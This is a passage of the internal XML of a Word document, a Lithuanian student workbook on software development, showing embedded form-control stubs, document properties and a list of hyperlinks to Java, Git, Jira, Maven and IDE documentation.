TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwareserver073/advanced-searching-861256227.html." TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jetbrains.com/help/idea/configuring-project-and-ide-settings.html." TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX35.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase/tutorial/java/javaOO/enum.html." TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.atlassian.com/software/jira/guides/getting-started/best-practices." TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/jirasoftwarecloud/creating-issues-and-sub-tasks-764478439.html." TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-clone" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX4.xml"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX46.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git-clon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15.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX16.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX17.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX18.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX19.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20.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX21.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX22.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX23.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX24.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX25.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX26.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX27.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX28.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX29.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30.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX31.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX32.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX33.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX34.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX35.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX36.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX37.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX38.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX39.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40.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX41.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX42.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX43.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX44.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX45.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX46.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX47.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX48.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX49.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50.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX51.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX52.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX53.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX54.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX55.xml><?xml version="1.0" encoding="utf-8"?>
<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ax:classid="{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}" ax:persistence="persistStream" r:id="rId1"/>
</file>

<file path=word/activeX/activeX56.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F68C7-529E-45D8-A25E-652CE51D5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5</Pages>
  <Words>197843</Words>
  <Characters>112772</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>939</Lines>
  <Paragraphs>619</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Teorinių ir praktinių užduočių mokinio sąsiuvinis</vt:lpstr>
      <vt:lpstr>Teorinių ir praktinių užduočių mokinio sąsiuvinis</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>HP</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>309996</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="894" baseType="variant">
      <vt:variant>
        <vt:i4>7209066</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>618</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.wikibooks.org/wiki/Introduction_to_Software_Engineering/Process/Life_Cycle.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4718653</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>615</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.wikipedia.org/wiki/Systems_development_life_cycle.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4718653</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>612</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.wikipedia.org/wiki/Systems_development_life_cycle.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7143503</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>609</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tutorialspoint.com/eclipse/eclipse_create_java_class.htm.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>720957</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>606</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tutorialspoint.com/eclipse/eclipse_create_java_package.htm.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179691</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>603</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tutorialspoint.com/eclipse/eclipse_create_java_project.htm.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8257588</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>600</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://testng.org/doc/download.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225921</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>597</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.seleniumhq.org/projects/webdriver/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5767248</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>594</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/java/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6815867</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>591</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.oracle.com/technetwork/java/codeconvtoc-136057.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915213</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>588</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://netbeans.apache.org/download/index.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3473458</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>585</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://netbeans.org/features.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179719</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>582</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://maven.apache.org/download.cgi</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225949</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>579</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://code.google.com/p/hamcrest/downloads/list</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179719</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>576</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://maven.apache.org/download.cgi</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3997800</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>573</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.oracle.com/technetwork/java/javase/downloads/index.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3276916</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>570</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/help/idea/debugging-your-first-java-application.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3670119</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>567</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/help/idea/using-git-integration.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3932209</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>564</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/help/idea/configuring-project-and-ide-settings.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4784139</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>561</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/idea/documentation/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3997800</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>558</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.oracle.com/technetwork/java/javase/downloads/index.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>262144</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>555</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.idalko.com/jira-workflow-best-practices.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225949</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>552</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://code.google.com/p/hamcrest/downloads/list</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5177419</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>549</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-checkout</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2228271</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>546</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-reset</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3145773</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>543</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-commit</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5374027</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>540</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-add</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3145775</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>537</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-status</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063277</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>534</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://git-scm.com/docs/git-clone</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5701697</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>531</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
